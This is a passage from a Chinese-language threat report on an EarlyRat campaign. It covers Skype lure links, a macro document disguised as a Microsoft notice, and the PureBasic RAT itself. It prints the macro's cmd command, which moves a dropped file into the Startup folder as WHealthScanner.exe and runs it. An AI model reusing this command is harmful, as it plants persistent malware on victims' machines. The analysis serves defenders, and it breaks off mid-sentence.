一、攻击活动分析
1.攻击流程分析
在我们的观察中,疑似攻击者通过Skype发送诱饵文件下载链接,之后用户通过谷歌浏览器下载了含有恶意文档的压缩文件。一旦用户被诱导打开该文件,攻击者则利用伪装成Microsoft信息的技巧,诱使用户启用宏功能。一旦用户上钩,宏将被激活并释放EarlyRat,然后开始窃取用户信息和执行恶意命令。
图1 攻击流程图
2.载荷投递分析
攻击者以冒充Microsoft的方式设计了诱饵文件,其目的在于诱导用户运行恶意宏代码。这些恶意宏首要任务是将内置二进制数据写入系统临时文件夹,具体路径为 %Temp%1vqar5tgi51.sak,接着借助cmd来执行以下命令。
/c ping -n 16 226.132.219.125&pushd&forfiles /P %tmp% /S /M 1Vqar5tGI51*.sak /C "cmd /c move /y @file "%appdata%MicrosoftWindowsStart MenuProgramsStartupWHealthScanner.exe"&ping -n 14 74.124.228.148&pushd&"%appdata%MicrosoftWindowsStart MenuProgramsStartupWHealthScanner.exe""
攻击者利用命令提示符对特定IP地址(226.132.219.125和74.124.228.148)执行ping操作,并在系统临时文件夹中寻找特定的恶意文件。找到后,文件将被移动并重命名为WHealthScanner.exe,存储在用户的启动文件夹中,以便在每次系统启动时都会运行。这种行为表明攻击者正试图获取持久的系统访问权限,并且该方法具有较高的隐蔽性。
图2 诱饵文件
3.攻击组件分析
由宏代码投递的恶意二进制文件被命名为EarlyRat[1]。EarlyRat是一个采用PureBasic框架编写的相对简单的远程访问木马(RAT)组件。尽管其设计较为简洁,但其能够高效地执行攻击者下发的命令和执行文件,这意味着攻击者能够利用EarlyRat在受害者的计算机上进行一系列的远程操作,从简单的系统监控到复杂的数据窃取或者更进一步的系统破坏,其灵活性和易用性让EarlyRat成为攻击者的有效工具。
恶意样本使用内置的key(n>t#8;S
